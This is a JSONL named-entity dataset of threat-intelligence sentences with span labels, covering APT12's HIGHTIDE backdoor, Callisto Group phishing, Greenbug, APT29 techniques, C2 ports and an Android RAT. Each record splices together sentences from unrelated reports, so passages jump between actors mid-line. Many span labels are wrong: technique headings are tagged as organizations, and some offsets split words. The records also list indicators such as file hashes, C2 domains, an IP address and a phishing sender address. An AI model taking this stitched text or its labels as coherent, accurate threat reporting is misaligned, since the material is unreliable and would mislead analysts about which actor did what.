{"text": "The reality is that the RAT permissions can be implemented just with the permissions declared on the manifest , thus there is no need for higher permissions . The affected organizations we were able to identify are mostly based in the Middle East . The blog highlighted that the backdoor was utilized in campaigns from March 2011 till May 2014 . MoonWind communicates over ports 80 , 443 , 53 , and 8080 via raw sockets instead of the protocols usually associated with the ports.[25 ] njRAT has used port 1177 for HTTP C2 communications.[26 ] During Operation Wocao , the threat actors used uncommon high ports for its backdoor C2 , including ports 25667 and 47000.[27 ]", "spans": [{"start": 346, "end": 354, "label": "Malware"}, {"start": 355, "end": 482, "label": "Indicator"}, {"start": 485, "end": 490, "label": "Malware"}, {"start": 500, "end": 509, "label": "Indicator"}, {"start": 514, "end": 540, "label": "System"}, {"start": 550, "end": 565, "label": "Organization"}, {"start": 572, "end": 585, "label": "Organization"}, {"start": 591, "end": 610, "label": "Indicator"}, {"start": 619, "end": 630, "label": "System"}, {"start": 643, "end": 654, "label": "Indicator"}, {"start": 659, "end": 668, "label": "Indicator"}]}
{"text": "Version # 3 : Sept. - Dec. 2019 \u2014 Domain : ponethus [ . one organization is located in the US . Following the release of the article , FireEye observed a distinct change in RIPTIDE \u2019s protocols and strings . PingPull can use HTTPS over port 8080 for C2.[28 ]", "spans": [{"start": 43, "end": 55, "label": "Indicator"}, {"start": 135, "end": 142, "label": "Organization"}, {"start": 173, "end": 180, "label": "Malware"}, {"start": 208, "end": 216, "label": "Malware"}, {"start": 225, "end": 230, "label": "System"}, {"start": 231, "end": 245, "label": "Indicator"}, {"start": 250, "end": 256, "label": "System"}]}
{"text": "] com Given that there is some overlap in the previous two versions , it came as no surprise to us that we finally identified a sample which is an evolution based on both previous versions . There are a number of factors in these groups' campaigns that suggests that the attackers may be based in Iran . We suspect this change was a direct result of the Arbor blog post in order to decrease detection of RIPTIDE by security vendors . PoetRAT used TLS to encrypt communications over port 143 QuasarRAT can use port 4782 on the compromised host for TCP callbacks .", "spans": [{"start": 354, "end": 359, "label": "Organization"}, {"start": 404, "end": 411, "label": "Malware"}, {"start": 434, "end": 441, "label": "Malware"}, {"start": 447, "end": 450, "label": "System"}, {"start": 477, "end": 490, "label": "Indicator"}, {"start": 491, "end": 500, "label": "Malware"}, {"start": 509, "end": 518, "label": "Indicator"}]}
{"text": "This sample is clearly a mix between the two . Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands . The changes to RIPTIDE were significant enough to circumvent existing RIPTIDE detection rules . RedLeaves can use HTTP over non - standard ports , such as 995 , for C2.Rocke 's miner connects to a C2 server using port 51640.[32 ]", "spans": [{"start": 47, "end": 53, "label": "System"}, {"start": 181, "end": 188, "label": "Malware"}, {"start": 236, "end": 243, "label": "Malware"}, {"start": 262, "end": 271, "label": "Malware"}, {"start": 276, "end": 324, "label": "Indicator"}, {"start": 363, "end": 372, "label": "System"}, {"start": 379, "end": 393, "label": "Indicator"}]}
{"text": "This is also the first version where the package name changes into something that a less aware user may be tricked by , com.android.playup . Their primary interest appears to be gathering intelligence . FireEye dubbed this new malware family HIGHTIDE . RTM used Port 44443 for its VNC module .", "spans": [{"start": 120, "end": 138, "label": "Indicator"}, {"start": 203, "end": 210, "label": "Organization"}, {"start": 242, "end": 250, "label": "Malware"}, {"start": 253, "end": 256, "label": "Organization"}, {"start": 262, "end": 272, "label": "Indicator"}, {"start": 281, "end": 291, "label": "System"}]}
{"text": "This version brings back the ACCESS_SUPERUSER and READ_FRAME_BUFFER permissions . This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being considerably older than the Blue variant . On Sunday August 24, 2014 we observed a spear phish email sent to a Taiwanese government ministry . Sandworm Team has used port 6789 to accept connections on the group 's SSH server.[34 ] Silence has used port 444 when sending data about the system from the client to the server.[35 ] StrongPity has used HTTPS over port 1402 in C2 communication.[36 ] SUGARUSH has used port 4585 for a TCP connection to its C2 .", "spans": [{"start": 191, "end": 204, "label": "System"}, {"start": 239, "end": 243, "label": "System"}, {"start": 306, "end": 311, "label": "System"}, {"start": 322, "end": 342, "label": "Organization"}, {"start": 354, "end": 367, "label": "Organization"}, {"start": 377, "end": 386, "label": "Indicator"}, {"start": 425, "end": 439, "label": "System"}, {"start": 442, "end": 449, "label": "Organization"}, {"start": 459, "end": 467, "label": "Indicator"}, {"start": 539, "end": 549, "label": "Organization"}, {"start": 559, "end": 564, "label": "System"}, {"start": 565, "end": 579, "label": "Indicator"}, {"start": 583, "end": 603, "label": "System"}, {"start": 606, "end": 614, "label": "Malware"}, {"start": 624, "end": 633, "label": "Indicator"}, {"start": 638, "end": 664, "label": "System"}]}
{"text": "However , this time , the permission is actually used . security policy in the Eastern Europe and South Caucasus regions . Attached to this email was a malicious Microsoft Word document ( MD5: f6fafb7c30b1114befc93f39d0698560 ) that exploited CVE-2012-0158 . TEMP.Veles has used port - protocol mismatches on ports such as 443 , 4444 , 8531 , and 50501 during C2 .", "spans": [{"start": 140, "end": 145, "label": "System"}, {"start": 162, "end": 171, "label": "Organization"}, {"start": 172, "end": 176, "label": "System"}, {"start": 193, "end": 225, "label": "Indicator"}, {"start": 243, "end": 256, "label": "Vulnerability"}, {"start": 259, "end": 269, "label": "Malware"}, {"start": 274, "end": 352, "label": "Indicator"}, {"start": 360, "end": 362, "label": "System"}]}
{"text": "WhatsApp message capture The service com.serenegiant.service.ScreenRecorderService , is invoked by the ScreenRecorderActivity . Callisto Group via credential phishingThese spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing . It is worth noting that this email appeared to have been sent from another Taiwanese Government employee , implying that the email was sent from a valid but compromised account . Some TrickBot samples have used HTTP over ports 447 and 8082 for C2 .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 37, "end": 82, "label": "Indicator"}, {"start": 412, "end": 417, "label": "System"}, {"start": 458, "end": 478, "label": "Organization"}, {"start": 508, "end": 513, "label": "System"}, {"start": 567, "end": 575, "label": "Malware"}, {"start": 594, "end": 613, "label": "Indicator"}, {"start": 618, "end": 622, "label": "Indicator"}, {"start": 627, "end": 629, "label": "System"}]}
{"text": "Upon creation , this activity launches a thread that will loop on a 50-second interval . In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform . HIGHTIDE : 6e59861931fa2796ee107dc27bfdd480 . Newer versions of TrickBot have been known to use a custom communication protocol which sends the data unencrypted over port 443 .", "spans": [{"start": 179, "end": 200, "label": "Malware"}, {"start": 249, "end": 254, "label": "System"}, {"start": 314, "end": 322, "label": "Malware"}, {"start": 325, "end": 357, "label": "Indicator"}, {"start": 378, "end": 386, "label": "Malware"}, {"start": 480, "end": 488, "label": "Indicator"}]}
{"text": "In the first iteration , the screen recording is started and will only stop when the RAT determines that WhatsApp is not running . These spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing . The HIGHTIDE backdoor connected directly to 141.108.2.157 . [ 42 ] TYPEFRAME has used ports 443 , 8080 , and 8443 with a FakeTLS method .", "spans": [{"start": 105, "end": 113, "label": "System"}, {"start": 352, "end": 369, "label": "Malware"}, {"start": 392, "end": 405, "label": "Indicator"}, {"start": 415, "end": 424, "label": "Malware"}, {"start": 434, "end": 443, "label": "Indicator"}, {"start": 446, "end": 450, "label": "Indicator"}, {"start": 457, "end": 461, "label": "Indicator"}]}
{"text": "It 's restarted in the next cycle independently based on if WhatsApp is running . Callisto Group appears to be intelligence gathering related to European foreign and security policy . If you compare the HTTP GET request from the RIPTIDE samples to the HTTP GET request from the HIGHTIDE samples you can see the malware author changed the following items : User Agent , Format and structure of the HTTP Uniform Resource Identifier ( URI ) . WellMail has been observed using TCP port 25 , without using SMTP , to leverage an open port for secure command and control communications .", "spans": [{"start": 60, "end": 68, "label": "System"}, {"start": 203, "end": 207, "label": "Indicator"}, {"start": 229, "end": 236, "label": "Malware"}, {"start": 252, "end": 256, "label": "Indicator"}, {"start": 278, "end": 286, "label": "Malware"}, {"start": 397, "end": 401, "label": "Indicator"}, {"start": 402, "end": 429, "label": "System"}, {"start": 432, "end": 435, "label": "System"}, {"start": 440, "end": 448, "label": "Malware"}, {"start": 473, "end": 484, "label": "Indicator"}]}
{"text": "In this version , the developer added more classes from the same package . some indications of loosely linked activity dating back to at least 2013 . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . WIRTE has used HTTPS over ports 2083 and 2087 for C2.ZxShell can use ports 1985 and 1986 in HTTP / S communication.[47 ] Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level .", "spans": [{"start": 161, "end": 168, "label": "Malware"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 215, "end": 223, "label": "Malware"}, {"start": 232, "end": 241, "label": "Organization"}, {"start": 242, "end": 246, "label": "System"}, {"start": 249, "end": 253, "label": "Indicator"}, {"start": 279, "end": 292, "label": "Vulnerability"}, {"start": 295, "end": 300, "label": "Malware"}, {"start": 310, "end": 315, "label": "System"}, {"start": 321, "end": 340, "label": "Indicator"}, {"start": 345, "end": 355, "label": "Malware"}, {"start": 364, "end": 413, "label": "Indicator"}]}
{"text": "Even though we could not find indications of being in use , two stand out . In October 2015 , the Callisto Group was observed sending targeted credential phishing emails . FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases . Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports for that particular network segment .", "spans": [{"start": 98, "end": 112, "label": "Organization"}, {"start": 172, "end": 179, "label": "Organization"}, {"start": 189, "end": 194, "label": "Organization"}, {"start": 240, "end": 246, "label": "System"}]}
{"text": "Bluetooth \u2014 which allows the interaction with the Bluetooth interface , and net/deacon \u2014 which implements a beaconing system based on UDP . In early 2016 , the Callisto Group was observed sending targeted spear phishing emails . Based on past APT12 activity , we expect the threat group to continue to utilize phishing as a malware delivery method . 0824.1.doc : f6fafb7c30b1114befc93f39d0698560 , CVE-2012-0158 . Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used .", "spans": [{"start": 243, "end": 248, "label": "Organization"}, {"start": 350, "end": 360, "label": "Indicator"}, {"start": 363, "end": 395, "label": "Indicator"}, {"start": 398, "end": 411, "label": "Vulnerability"}]}
{"text": "Android shell A new package was added that allows the execution of commands in the Android shell . The malicious attachments purported to be invitations or drafts of the agenda for the conference . Jason_invitation.doc : 00a95fb30be2d6271c491545f6c6a707 , CVE-2012-0158 . Monitor network data flows for unexpected patterns and metadata that may be indicative of a mismatch between protocol and utilized port .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 83, "end": 90, "label": "System"}, {"start": 103, "end": 124, "label": "Malware"}, {"start": 141, "end": 152, "label": "System"}, {"start": 156, "end": 176, "label": "System"}, {"start": 198, "end": 218, "label": "Indicator"}, {"start": 221, "end": 253, "label": "Indicator"}, {"start": 256, "end": 269, "label": "Vulnerability"}]}
{"text": "Again , this package source code is publicly available and can be found here . Based on our analysis of Callisto Group 's usage of RCS Galileo , we believe the Callisto Group did not utilize the leaked RCS Galileo source code , but rather used the leaked readymade installers to set up their own installation of the RCS Galileo platform . When the file is opened , it drops HIGHTIDE in the form of an executable file onto the infected system . Additional Email Delegate Permissions APT29 has used a compromised global administrator account in Azure AD to backdoor a service principal with ApplicationImpersonation rights to start collecting emails from targeted mailboxe .", "spans": [{"start": 104, "end": 118, "label": "Organization"}, {"start": 265, "end": 275, "label": "System"}, {"start": 374, "end": 382, "label": "Malware"}, {"start": 482, "end": 487, "label": "Organization"}]}
{"text": "One of the uses the malware gives to this package is the execution of the command \" dumpsys '' to determine if certain activities are running . In the known spear phishing attacks by the Callisto Group , they employed the \" Scout \" malware tool from the RCS Galileo platform . RIPTIDE and HIGHTIDE differ on several points : executable file location , image base address , the User-Agent within the GET requests , and the format of the URI . During the SolarWinds Compromise , APT29 added their own devices as allowed IDs for active sync using Set - CASMailbox , allowing it to obtain copies of victim mailboxes .", "spans": [{"start": 187, "end": 201, "label": "Organization"}, {"start": 224, "end": 229, "label": "System"}, {"start": 258, "end": 265, "label": "Organization"}, {"start": 277, "end": 284, "label": "Malware"}, {"start": 289, "end": 297, "label": "Malware"}, {"start": 436, "end": 439, "label": "System"}, {"start": 453, "end": 474, "label": "Organization"}, {"start": 477, "end": 482, "label": "Organization"}]}
{"text": "Check if chat apps are running In the above example , the malware is searching for Line , Facebook Messenger and WhatsApp activities . We are confident the Callisto Group used this type of access to a target 's email account for the purposes of sending spear phishing to other targets . The RIPTIDE exploit document drops its executable file into the C:\\Documents and Settings\\{user}\\Application Data\\Location folder while the HIGHTIDE exploit document drops its executable file into the C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\ folder . Device Registration APT29 has enrolled a device in MFA to an Azure AD environment following a successful password guessing attack against a dormant account .", "spans": [{"start": 90, "end": 108, "label": "System"}, {"start": 113, "end": 121, "label": "System"}, {"start": 291, "end": 298, "label": "Malware"}, {"start": 427, "end": 435, "label": "Malware"}, {"start": 551, "end": 576, "label": "Organization"}]}
{"text": "This is part of a class called CaptureService , which already existed in the previous version but it was not duly implemented . If a target of the spear phishing described in \" Phase 2 : malware deployment \" opened the email attachment and , crucially , clicked on the icon in the attachment , this would lead to the target 's computer becoming infected with the \" Scout \" malware tool from the RCS Galileo platform . All but one sample that we identified were written to this folder as word.exe . During the SolarWinds Compromise , APT29 registered devices in order to enable mailbox syncing via the Set - CASMailbox command . .006", "spans": [{"start": 365, "end": 370, "label": "System"}, {"start": 487, "end": 495, "label": "Indicator"}, {"start": 509, "end": 530, "label": "Organization"}, {"start": 533, "end": 538, "label": "Organization"}]}
{"text": "Previous version The capture service class implements the chat applications interception . Callisto Group and related infrastructure contain links to at least Russia , Ukraine , and China . The one outlier was written as winword.exe . Acquire Infrastructure : Web Services APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware , such as HAMMERTOSS .", "spans": [{"start": 221, "end": 232, "label": "Indicator"}, {"start": 260, "end": 278, "label": "Organization"}, {"start": 354, "end": 356, "label": "System"}, {"start": 360, "end": 367, "label": "Malware"}, {"start": 378, "end": 388, "label": "Malware"}]}
{"text": "Upon creation the class will start to take screenshots that will be stopped and uploaded to the C2 once the service ca n't find the targeted applications running . they have been last known to employ malware in February 2016 . Research into this HIGHTIDE campaign revealed APT12 targeted multiple Taiwanese Government organizations between August 22 and 28 . APT29 has also used legitimate web services such as Dropbox and Constant Contact in their operations .", "spans": [{"start": 246, "end": 254, "label": "Malware"}, {"start": 273, "end": 278, "label": "Organization"}, {"start": 297, "end": 317, "label": "Organization"}, {"start": 359, "end": 364, "label": "Organization"}]}
{"text": "The core of this functionality is also based on an open-source project that can be found here . RCS Galileo platform . On Monday August 25, 2014 we observed a different spear phish email sent from lilywang823@gmail.com to a technology company located in Taiwan . Cloud Administration Command APT29 has used Azure Run Command and Azure Admin - on - Behalf - of ( AOBO ) to execute code on virtual machines .", "spans": [{"start": 181, "end": 186, "label": "System"}, {"start": 197, "end": 218, "label": "Indicator"}, {"start": 263, "end": 297, "label": "Organization"}, {"start": 307, "end": 324, "label": "System"}, {"start": 329, "end": 368, "label": "System"}]}
{"text": "Another novelty is a VPN-related package , which is based on OrbotVPN . The spear phishing emails used in the known attacks by the Callisto Group were so convincing that even skilled and alert users would likely have attempted to open the malicious attachment . This spear phish contained a malicious Word document that exploited CVE-2012-0158 . Cloud API APT29 has leveraged the Microsoft Graph API to perform various actions across Azure and M365 environments .", "spans": [{"start": 61, "end": 69, "label": "System"}, {"start": 131, "end": 145, "label": "Organization"}, {"start": 301, "end": 305, "label": "System"}, {"start": 330, "end": 343, "label": "Vulnerability"}, {"start": 346, "end": 361, "label": "Organization"}, {"start": 380, "end": 399, "label": "System"}, {"start": 434, "end": 461, "label": "System"}]}
{"text": "Once again , it does n't seem to actually be in use . In October 2015 the Callisto Group targeted a handful of individuals with phishing emails that attempted to obtain the target 's webmail credentials . The MD5 of the exploit document was e009b95ff7b69cbbebc538b2c5728b11 . They have also utilized AADInternals PowerShell Modules to access the API .003 Compromise Accounts : Cloud Accounts APT29 has used residential proxies , including Azure Virtual Machines , to obfuscate their access to victim environments .", "spans": [{"start": 241, "end": 273, "label": "Indicator"}, {"start": 377, "end": 397, "label": "Organization"}, {"start": 407, "end": 426, "label": "System"}, {"start": 439, "end": 461, "label": "System"}]}
{"text": "The same happens with the package squareup.otto , which is an open-source bus implementation focused on Android implementation . The Callisto Group has been active at least since late 2015 and continues to be so , including continuing to set up new phishing infrastructure every week . Similar to the newly discovered HIGHTIDE samples documented above , this malicious document dropped a backdoor to C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe . Enterprise T1482 Domain Trust Discovery During the SolarWinds Compromise , APT29 used the Get - AcceptedDomain PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell .", "spans": [{"start": 34, "end": 47, "label": "Indicator"}, {"start": 104, "end": 111, "label": "System"}, {"start": 318, "end": 326, "label": "Malware"}, {"start": 439, "end": 461, "label": "Indicator"}, {"start": 511, "end": 536, "label": "Organization"}, {"start": 539, "end": 544, "label": "Organization"}]}
{"text": "Both sources can be found here and here . Called Greenbug , this group is believed to be instrumental in helping Shamoon steal user credentials of targets ahead of Shamoon 's destructive attacks . THREEBYTE : 16e627dbe730488b1c3d448bfc9096e2 . They also used AdFind to enumerate domains and to discover trust between federated domains .", "spans": [{"start": 197, "end": 206, "label": "Malware"}, {"start": 209, "end": 241, "label": "Indicator"}, {"start": 259, "end": 265, "label": "System"}]}
{"text": "Version # 4 : April 2020 \u2014 Domain : nampriknum.net Following the same pattern , this version has some added features and others , which were not in use , removed . On Tuesday , Arbor Networks said that it has new leads on a credential stealing remote access Trojan ( RAT ) called Ismdoor , possibly used by Greenbug to steal credentials on Shamoon 's behalf . This backdoor sent the following callback traffic to video.csmcpr.com . Dynamic Resolution During the SolarWinds Compromise , APT29 used dynamic DNS resolution to construct and resolve to randomly - generated subdomains for C2.[12 ]", "spans": [{"start": 36, "end": 50, "label": "Indicator"}, {"start": 177, "end": 191, "label": "Organization"}, {"start": 258, "end": 264, "label": "System"}, {"start": 267, "end": 270, "label": "System"}, {"start": 280, "end": 287, "label": "System"}, {"start": 413, "end": 429, "label": "Indicator"}, {"start": 462, "end": 483, "label": "Organization"}, {"start": 486, "end": 491, "label": "Organization"}]}
{"text": "First of all the new package name is com.google.services , which can easily be confused with a legitimate Google service . \" With our latest research we now see how Greenbug has shifted away from HTTP-based C2 communication with Ismdoor . The THREEBYTE spear phishing incident ( while not yet attributed ) shared the following characteristics with the above HIGHTIDE campaign attributed to APT12 : The THREEBYTE backdoor was compiled two days after the HIGHTIDE backdoors ; Encrypted Channel APT29 has used multiple layers of encryption within malware to protect C2 communication .", "spans": [{"start": 37, "end": 56, "label": "Indicator"}, {"start": 106, "end": 112, "label": "Organization"}, {"start": 229, "end": 236, "label": "System"}, {"start": 243, "end": 252, "label": "Malware"}, {"start": 358, "end": 366, "label": "Malware"}, {"start": 390, "end": 395, "label": "Organization"}, {"start": 402, "end": 420, "label": "Malware"}, {"start": 453, "end": 471, "label": "Malware"}, {"start": 492, "end": 497, "label": "Organization"}]}
{"text": "The VPN package is no longer present , further reinforcing our conclusion that it was not in use . It's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . Both the THREEBYTE and HIGHTIDE backdoors were used in attacks targeting organizations in Taiwan ; Hybrid Identity APT29 has edited the Microsoft.IdentityServer.Servicehost.exe.config file to load a malicious DLL into the AD FS process , thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name .", "spans": [{"start": 125, "end": 151, "label": "System"}, {"start": 282, "end": 301, "label": "Organization"}, {"start": 347, "end": 356, "label": "Malware"}, {"start": 361, "end": 379, "label": "Malware"}, {"start": 437, "end": 458, "label": "Organization"}]}
{"text": "WolfRAT application screen The Google GMS and Firebase service has been added , however , no configuration has been found , even though services seem to be referenced in the of a new class . t's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . Both the THREEBYTE and HIGHTIDE backdoors were written to the same filepath of C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe ; Spearphishing Attachment APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims.002 Phishing : Spearphishing Link APT29 has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.003 Phishing : Spearphishing via Service APT29 has used the legitimate mailing service Constant Contact to send phishing e - mails .003", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 31, "end": 41, "label": "System"}, {"start": 46, "end": 54, "label": "System"}, {"start": 216, "end": 242, "label": "System"}, {"start": 373, "end": 392, "label": "Organization"}, {"start": 438, "end": 447, "label": "Malware"}, {"start": 452, "end": 470, "label": "Malware"}, {"start": 547, "end": 569, "label": "Indicator"}, {"start": 572, "end": 602, "label": "Organization"}, {"start": 717, "end": 741, "label": "Organization"}, {"start": 874, "end": 905, "label": "Organization"}]}
{"text": "The new class is called NotificationListener and extends the NotificationListenerService class . By relying on a native PDF command to navigate to a new URL , Zirconium successfully circumvented Chrome 's anti-redirect protection . APT12 has previously used the THREEBYTE backdoor . Proxy : Multi - hop Proxy A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 ( RDP ) , 139 ( Netbios ) , and 445 ( SMB ) enabling full remote access from outside the network and has also used TOR .004", "spans": [{"start": 232, "end": 237, "label": "Organization"}, {"start": 262, "end": 280, "label": "Malware"}, {"start": 291, "end": 319, "label": "Malware"}, {"start": 328, "end": 333, "label": "Organization"}, {"start": 537, "end": 540, "label": "System"}]}
{"text": "This would allow the RAT to receive system notifications . In the context of the Ismdoor RAT , the DNS attack technique is used primarily by Greenbug for stealing credentials . On August 25, 2014, we observed another round of spear phishing emails targeting a high-technology company in Japan . Proxy : Domain Fronting APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.007 Remote Services : Cloud Services APT29 has leveraged compromised high - privileged on - premises accounts synced to Office 365 to move laterally into a cloud environment , including through the use of Azure AD PowerShell .", "spans": [{"start": 81, "end": 92, "label": "System"}, {"start": 241, "end": 247, "label": "System"}, {"start": 303, "end": 324, "label": "Organization"}, {"start": 416, "end": 431, "label": "System"}, {"start": 434, "end": 454, "label": "Organization"}, {"start": 617, "end": 636, "label": "System"}]}
{"text": "Notification handling method The class is only implemented in debug mode , pushing all captured information into the log . To do this , it employs a number of specific commands via DNSMessenger . Attached to this email was another malicious document that was designed to exploit CVE-2012-0158 . Scheduled Task / Job : Scheduled Task APT29 has used named and hijacked scheduled tasks to establish persistence .", "spans": [{"start": 139, "end": 176, "label": "Malware"}, {"start": 181, "end": 193, "label": "System"}, {"start": 213, "end": 218, "label": "System"}, {"start": 279, "end": 292, "label": "Vulnerability"}, {"start": 318, "end": 338, "label": "Organization"}]}
{"text": "The usage of the PlusShare API in 2020 denotes some unprofessional development , since this is the API to access Google+ . Iranian Threat Agent Greenbug has been registering domains similar to those of Israeli High-Tech and Cyber Security Companies . This malicious Word document had an MD5 of 499bec15ac83f2c8998f03917b63652e and dropped a backdoor to C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe . During the SolarWinds Compromise , APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement .", "spans": [{"start": 17, "end": 26, "label": "System"}, {"start": 113, "end": 120, "label": "Organization"}, {"start": 210, "end": 219, "label": "Organization"}, {"start": 224, "end": 248, "label": "Organization"}, {"start": 294, "end": 326, "label": "Indicator"}, {"start": 392, "end": 414, "label": "Indicator"}, {"start": 428, "end": 449, "label": "Organization"}, {"start": 452, "end": 457, "label": "Organization"}]}
{"text": "This service , along with the API , was fully decommissioned in March 2019 . By pivoting off the registration details and servers data of the two domains we discovered others registered by the threat agent . The backdoor had the following properties : They manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration .", "spans": []}
{"text": "This version adds one significant class \u2014 it requests DEVICE_ADMIN privileges . Named Trochilus , this new RAT was part of Group 27 's malware portfolio that included six other malware strains , all served together or in different combinations , based on the data that needed to be stolen from each victim . WATERSPOUT : APT29 also created a scheduled task to maintain SUNSPOT persistence when the host booted .", "spans": [{"start": 86, "end": 95, "label": "System"}, {"start": 107, "end": 110, "label": "System"}, {"start": 308, "end": 318, "label": "Malware"}, {"start": 321, "end": 326, "label": "Organization"}]}
{"text": "Device admin policies Looking at the policy 's definition , we can see that it lists all the available policies even if most of them are deprecated on Android 10.0 and their usage results in a security exception . According to the security experts , this collection of malware was discovered after their first initial report was published , meaning that Group 27 ignored the fact they were unmasked and continued to infect their targets regardless , through the same entry point , the Myanmar Union Election Commission ( UEC ) website . f9cfda6062a8ac9e332186a7ec0e706a . Enterprise T1649 Steal or Forge Authentication Certificates APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates .", "spans": [{"start": 151, "end": 163, "label": "System"}, {"start": 485, "end": 518, "label": "Organization"}, {"start": 521, "end": 524, "label": "Organization"}, {"start": 537, "end": 569, "label": "Indicator"}, {"start": 589, "end": 637, "label": "Organization"}]}
{"text": "The code implementation again seems that it has been added for testing purposes only . Trochilus RAT activity was discovered during both months of October and November 2015 . The backdoor connects to a command and control server at icc.ignorelist.com . Enterprise T1082 System Information Discovery During the SolarWinds Compromise , APT29 used fsutil to check available free space before executing actions that might create large files on disk .", "spans": [{"start": 232, "end": 250, "label": "Indicator"}, {"start": 306, "end": 331, "label": "Organization"}, {"start": 334, "end": 339, "label": "Organization"}]}
{"text": "Versions overview The DenDroid code base was kept to such an extent that even the original base64-encoded password was kept . From September 2016 through late November 2016 , a threat actor group used both the Trochilus RAT and a newly idenfied RAT we've named MoonWind to target organizations in Thailand , including a utility organization . Similar to RIPTIDE and HIGHTIDE , the WATERSPOUT backdoor is an HTTP based backdoor that communicates with its C2 server . Enterprise T1199 Trusted Relationship APT29 has compromised IT , cloud services , and managed services providers to gain broad access to multiple customers for subsequent operations .", "spans": [{"start": 22, "end": 30, "label": "Malware"}, {"start": 210, "end": 223, "label": "System"}, {"start": 245, "end": 248, "label": "System"}, {"start": 261, "end": 269, "label": "System"}, {"start": 320, "end": 340, "label": "Organization"}, {"start": 354, "end": 361, "label": "Malware"}, {"start": 366, "end": 374, "label": "Malware"}, {"start": 381, "end": 400, "label": "Malware"}, {"start": 407, "end": 411, "label": "Indicator"}, {"start": 454, "end": 456, "label": "System"}, {"start": 483, "end": 509, "label": "Organization"}, {"start": 526, "end": 528, "label": "System"}, {"start": 531, "end": 545, "label": "System"}, {"start": 552, "end": 578, "label": "System"}]}
{"text": "Original password The main service follows the same structure as the first version , the anti-analysis features are primitive , only checking the emulator environment without any kind of packing or obfuscation . We chose the name ' MoonWind ' based on debugging strings we saw within the samples , as well as the compiler used to generate the samples . Although there are no current infrastructure ties to link this backdoor to APT12 , there are several data points that show a possible tie to the same actors : During the SolarWinds Compromise , APT29 gained access through compromised accounts at cloud solution partners , and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems .", "spans": [{"start": 232, "end": 240, "label": "System"}, {"start": 428, "end": 433, "label": "Organization"}, {"start": 519, "end": 544, "label": "Organization"}, {"start": 547, "end": 552, "label": "Organization"}]}
{"text": "The malware will start the main service if all the requested permissions and the device admin privileges are granted . The attackers compromised two legitimate Thai websites to host the malware , which is a tactic this group has used in the past . Same initial delivery method ( spear phishing email ) with a Microsoft Word Document exploiting CVE-2012-0158 . User Execution : Malicious Link APT29 has used various forms of spearphishing attempting to get a user to click on a malicous link .002 User Execution : Malicious File APT29 has used various forms of spearphishing attempting to get a user to open attachments , including , but not limited to , malicious Microsoft Word documents , .pdf , and .lnk files .", "spans": [{"start": 149, "end": 173, "label": "System"}, {"start": 294, "end": 299, "label": "System"}, {"start": 309, "end": 318, "label": "Organization"}, {"start": 319, "end": 323, "label": "System"}, {"start": 344, "end": 357, "label": "Vulnerability"}, {"start": 377, "end": 397, "label": "Organization"}, {"start": 513, "end": 533, "label": "Organization"}]}
{"text": "Otherwise , it will launch an ACTION_APPLICATION_SETTINGS intent trying to trick the user to grant the permissions . Both the Trochilus and MoonWind RATs were hosted on the same compromised sites and used to target the same organization at the same time . The same \u201c Tran Duy Linh \u201d Microsoft Word Exploit Kit was used in delivery of this backdoor . Enterprise T1078 Valid Accounts APT29 has used a compromised account to access an organization 's VPN infrastructure .", "spans": [{"start": 126, "end": 135, "label": "System"}, {"start": 140, "end": 153, "label": "System"}, {"start": 267, "end": 280, "label": "System"}, {"start": 283, "end": 292, "label": "Organization"}, {"start": 293, "end": 297, "label": "System"}, {"start": 373, "end": 387, "label": "Organization"}, {"start": 432, "end": 466, "label": "System"}]}
{"text": "Each sample contains a userId hardcoded , meaning that each sample can only be used in a victim . The attackers used different command and control servers ( C2s ) for each malware family , a tactic we believe was meant to thwart attempts to tie the attacks together using infrastructure alone . Similar Targets were observed where the threat actors utilized this backdoor : Japanese Tech Company , Taiwanese Government Organizations , Organizations in the Asia-Pacific Region that are of Interest to China . During the SolarWinds Compromise , APT29 used different compromised credentials for remote access and to move laterally .", "spans": [{"start": 127, "end": 154, "label": "System"}, {"start": 374, "end": 395, "label": "Organization"}, {"start": 398, "end": 418, "label": "Organization"}, {"start": 515, "end": 540, "label": "Organization"}, {"start": 543, "end": 548, "label": "Organization"}]}
